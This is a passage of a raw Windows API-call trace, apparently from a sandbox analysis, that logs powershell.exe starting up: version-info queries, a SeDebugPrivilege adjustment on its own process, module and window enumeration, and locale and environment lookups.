CoTaskMemAlloc (cb=0x66) returned 0x156c90 [0056.778] lstrcpyW (in: lpString1=0x156c90, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0056.778] CoTaskMemFree (pv=0x156c90) [0056.778] VerQueryValueW (in: pBlock=0x2dd7388, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x24dde8, puLen=0x24dde0 | out: lplpBuffer=0x24dde8*=0x0, puLen=0x24dde0) returned 0 [0056.778] VerQueryValueW (in: pBlock=0x2dd7388, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x24dde8, puLen=0x24dde0 | out: lplpBuffer=0x24dde8*=0x0, puLen=0x24dde0) returned 0 [0056.778] VerQueryValueW (in: pBlock=0x2dd7388, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x24dde8, puLen=0x24dde0 | out: lplpBuffer=0x24dde8*=0x0, puLen=0x24dde0) returned 0 [0056.778] VerQueryValueW (in: pBlock=0x2dd7388, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24ddb8, puLen=0x24ddb0 | out: lplpBuffer=0x24ddb8*=0x2dd7424, puLen=0x24ddb0) returned 1 [0056.781] CoTaskMemAlloc (cb=0x204) returned 0xe6e40 [0056.781] VerLanguageNameW (in: wLang=0x0, szLang=0xe6e40, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0056.783] CoTaskMemFree (pv=0xe6e40) [0056.783] VerQueryValueW (in: pBlock=0x2dd7388, lpSubBlock="\\", lplpBuffer=0x24de08, puLen=0x24de00 | out: lplpBuffer=0x24de08*=0x2dd73b0, puLen=0x24de00) returned 1 [0056.823] GetCurrentProcessId () returned 0xac8 [0056.875] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x24cd30 | out: lpLuid=0x24cd30*(LowPart=0x14, HighPart=0)) returned 1 [0056.878] GetCurrentProcess () returned 0xffffffffffffffff [0056.878] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x24cd50 | out: TokenHandle=0x24cd50*=0x2ec) returned 1 [0056.881] AdjustTokenPrivileges (in: TokenHandle=0x2ec, DisableAllPrivileges=0, NewState=0x2ddac00*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0056.883] CloseHandle (hObject=0x2ec) returned 1 [0056.904] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xac8) returned 0x2ec [0056.922] EnumProcessModules (in: hProcess=0x2ec, lphModule=0x2ddac68, cb=0x200, lpcbNeeded=0x24dd68 | out: lphModule=0x2ddac68, lpcbNeeded=0x24dd68) returned 1 [0056.925] GetModuleInformation (in: hProcess=0x2ec, hModule=0x13fbe0000, lpmodinfo=0x2ddaed8, cb=0x18 | out: lpmodinfo=0x2ddaed8*(lpBaseOfDll=0x13fbe0000, SizeOfImage=0x77000, EntryPoint=0x13fbec63c)) returned 1 [0056.926] CoTaskMemAlloc (cb=0x804) returned 0x1607a0 [0056.926] GetModuleBaseNameW (in: hProcess=0x2ec, hModule=0x13fbe0000, lpBaseName=0x1607a0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0056.926] CoTaskMemFree (pv=0x1607a0) [0056.927] CoTaskMemAlloc (cb=0x804) returned 0x1607a0 [0056.927] GetModuleFileNameExW (in: hProcess=0x2ec, hModule=0x13fbe0000, lpFilename=0x1607a0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0056.927] CoTaskMemFree (pv=0x1607a0) [0056.928] CloseHandle (hObject=0x2ec) returned 1 [0056.938] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xac8) returned 0x2ec [0056.939] GetExitCodeProcess (in: hProcess=0x2ec, lpExitCode=0x24de98 | out: lpExitCode=0x24de98*=0x103) returned 1 [0056.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12ddb088, Length=0x20000, ResultLength=0x24de60 | out: SystemInformation=0x12ddb088, ResultLength=0x24de60*=0xd4c8) returned 0x0 [0056.963] EnumWindows (lpEnumFunc=0x2a866ac, lParam=0x0) returned 1 [0056.963] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x5fc [0056.964] GetWindowThreadProcessId (in: hWnd=0x1013c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x69c [0056.964] GetWindowThreadProcessId (in: hWnd=0x200d0, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4a4 [0056.964] GetWindowThreadProcessId (in: hWnd=0x200d8, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4a4 [0056.964] GetWindowThreadProcessId (in: hWnd=0x200e2, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4a4 [0056.964] GetWindowThreadProcessId (in: hWnd=0x200e8, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4a4 [0056.964] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4a4 [0056.964] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4a4 [0056.964] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4a4 [0056.965] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4a4 [0056.965] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4a4 [0056.965] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4a4 [0056.965] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4a4 [0056.965] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4a4 [0056.965] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4a4 [0056.965] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x464 [0056.966] GetWindowThreadProcessId (in: hWnd=0x5009c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4a4 [0056.966] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4a4 [0056.966] GetWindowThreadProcessId (in: hWnd=0x201c4, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x94c [0056.966] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xacc [0056.967] GetWindow (hWnd=0x10214, uCmd=0x4) returned 0x0 [0056.967] IsWindowVisible (hWnd=0x10214) returned 0 [0056.967] GetWindowThreadProcessId (in: hWnd=0x101fc, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x94c [0056.968] GetWindowThreadProcessId (in: hWnd=0x101fa, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x94c [0056.968] GetWindowThreadProcessId (in: hWnd=0x101f6, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x94c [0056.968] GetWindowThreadProcessId (in: hWnd=0x101f4, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x94c [0056.968] GetWindowThreadProcessId (in: hWnd=0x501b2, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x988 [0056.968] GetWindowThreadProcessId (in: hWnd=0x201cc, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x94c [0056.968] GetWindowThreadProcessId (in: hWnd=0x201bc, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x94c [0056.968] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x890 [0056.968] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x880 [0056.968] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x870 [0056.969] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x860 [0056.969] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x850 [0056.969] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x840 [0056.969] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x830 [0056.969] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x820 [0056.969] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x810 [0056.969] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x768 [0056.969] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x364 [0056.969] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x3f0 [0056.970] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x6bc [0056.970] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x23c [0056.970] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x578 [0056.970] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x57c [0056.970] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4b4 [0056.970] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x764 [0056.970] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x120 [0056.970] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x64c [0056.970] GetWindowThreadProcessId (in: hWnd=0x30110, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1c4 [0056.971] GetWindowThreadProcessId (in: hWnd=0x20120, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x210 [0056.971] GetWindowThreadProcessId (in: hWnd=0x9009e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x7f8 [0056.971] GetWindowThreadProcessId (in: hWnd=0x20162, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x5c0 [0056.971] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x5fc [0056.971] GetWindowThreadProcessId (in: hWnd=0x1014c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x5ec [0056.971] GetWindowThreadProcessId (in: hWnd=0x20142, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x5fc [0056.971] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x5ec [0056.971] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x5fc [0056.971] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x5c0 [0056.972] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x5c0 [0056.972] GetWindowThreadProcessId (in: hWnd=0x200e4, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4a4 [0056.972] GetWindowThreadProcessId (in: hWnd=0x300bc, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4a4 [0056.972] GetWindowThreadProcessId (in: hWnd=0x300aa, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4a4 [0056.972] GetWindowThreadProcessId (in: hWnd=0x200b8, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4a4 [0056.972] GetWindowThreadProcessId (in: hWnd=0x200c0, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4a4 [0056.972] GetWindowThreadProcessId (in: hWnd=0x300c4, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4a4 [0056.972] GetWindowThreadProcessId (in: hWnd=0x800a2, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4a4 [0056.972] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x594 [0056.973] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x730 [0056.973] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x5b8 [0056.973] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x464 [0056.973] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x58c [0056.973] GetWindowThreadProcessId (in: hWnd=0x5008e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4a4 [0056.973] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x550 [0056.973] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4a4 [0056.973] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4a4 [0056.973] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4a4 [0056.974] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x528 [0056.974] GetWindowThreadProcessId (in: hWnd=0x2010a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x614 [0056.974] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4a4 [0056.974] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4f0 [0056.974] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4a4 [0056.974] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x464 [0056.974] GetWindowThreadProcessId (in: hWnd=0x20040, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x464 [0056.974] GetWindowThreadProcessId (in: hWnd=0x3003e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x454 [0056.974] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x7f4 [0056.975] GetWindowThreadProcessId (in: hWnd=0x100ee, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x464 [0056.975] GetWindowThreadProcessId (in: hWnd=0x1013e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x69c [0056.975] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4a4 [0056.975] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4a4 [0056.975] GetWindowThreadProcessId (in: hWnd=0x101e6, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x94c [0056.975] GetWindowThreadProcessId (in: hWnd=0x201b6, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x94c [0056.975] GetWindowThreadProcessId (in: hWnd=0x1021a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xadc [0056.975] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0xadc [0056.975] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x890 [0056.976] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x880 [0056.976] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x870 [0056.976] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x860 [0056.976] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x850 [0056.976] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x840 [0056.976] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x830 [0056.976] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x820 [0056.976] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x810 [0056.976] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x768 [0056.977] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x364 [0056.977] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x3f0 [0056.977] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x6bc [0056.977] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x23c [0056.977] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x578 [0056.977] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x57c [0056.977] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4b4 [0056.977] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x764 [0056.977] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x120 [0056.978] GetWindowThreadProcessId (in: hWnd=0x50160, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x64c [0056.978] GetWindowThreadProcessId (in: hWnd=0x40158, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x1c4 [0056.978] GetWindowThreadProcessId (in: hWnd=0x4015e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x210 [0056.978] GetWindowThreadProcessId (in: hWnd=0x3010c, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x7f8 [0056.978] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x5ec [0056.978] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x5fc [0056.978] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x5c0 [0056.978] GetWindowThreadProcessId (in: hWnd=0x20022, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x594 [0056.978] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x730 [0056.979] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x464 [0056.979] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x528 [0056.979] GetWindowThreadProcessId (in: hWnd=0x1010e, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x614 [0056.979] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x4f0 [0056.979] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x464 [0056.979] GetWindowThreadProcessId (in: hWnd=0x20024, lpdwProcessId=0x24dbc0 | out: lpdwProcessId=0x24dbc0) returned 0x7f4 [0056.988] WerSetFlags () returned 0x0 [0057.016] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0057.016] CoTaskMemFree (pv=0x0) [0057.017] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x24df28, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x24df20 | out: pulNumLanguages=0x24df28, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x24df20) returned 1 [0057.017] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x24df28, pwszLanguagesBuffer=0x2df8868, pcchLanguagesBuffer=0x24df20 | out: pulNumLanguages=0x24df28, pwszLanguagesBuffer=0x2df8868, pcchLanguagesBuffer=0x24df20) returned 1 [0057.026] CoTaskMemAlloc (cb=0x24) returned 0x15ebc0 [0057.026] GetUserDefaultLocaleName (in: lpLocaleName=0x15ebc0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0057.026] CoTaskMemFree (pv=0x15ebc0) [0057.084] CoTaskMemAlloc (cb=0x104) returned 0xb3750 [0057.084] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xb3750, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.084] CoTaskMemFree (pv=0xb3750) [0057.089] CoTaskMemAlloc (cb=0x104) returned 0xb3750 [0057.089] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xb3750, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.090] CoTaskMemFree (pv=0xb3750) [0057.093] CoTaskMemAlloc (cb=0x104) returned 0xb3750 [0057.093] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xb3750, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.093] CoTaskMemFree (pv=0xb3750) [0057.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0057.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0057.122] SetErrorMode (uMode=0x1) returned 0x1 [0057.122] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x24dba0 | out: lpFileInformation=0x24dba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0057.123] SetErrorMode (uMode=0x1) returned 0x1 [0057.123] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x24de10 | out: lpdwHandle=0x24de10) returned 0x94c [0057.126] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2dfc0f8 | out: lpData=0x2dfc0f8) returned 1 [0057.127] VerQueryValueW (in: pBlock=0x2dfc0f8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24dd88, puLen=0x24dd80 | out: lplpBuffer=0x24dd88*=0x2dfc194, puLen=0x24dd80) returned 1 [0057.127] VerQueryValueW (in: pBlock=0x2dfc0f8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x24dcf8, puLen=0x24dcf0 | out: lplpBuffer=0x24dcf8*=0x2dfc270, puLen=0x24dcf0) returned 1 [0057.127] lstrlenW (lpString="Microsoft Corporation") returned 21 [0057.127] CoTaskMemAlloc (cb=0x2e) returned 0x15a170 [0057.127] lstrcpyW (in: lpString1=0x15a170, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0057.127] CoTaskMemFree (pv=0x15a170) [0057.127] VerQueryValueW (in: pBlock=0x2dfc0f8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x24dcf8, puLen=0x24dcf0 | out: lplpBuffer=0x24dcf8*=0x2dfc2c4, puLen=0x24dcf0) returned 1 [0057.127] lstrlenW (lpString="System.Management.Automation") returned 28 [0057.127] CoTaskMemAlloc (cb=0x3c) returned 0x89bf0 [0057.127] lstrcpyW (in: lpString1=0x89bf0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0057.127] CoTaskMemFree (pv=0x89bf0) [0057.127] VerQueryValueW (in: pBlock=0x2dfc0f8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", 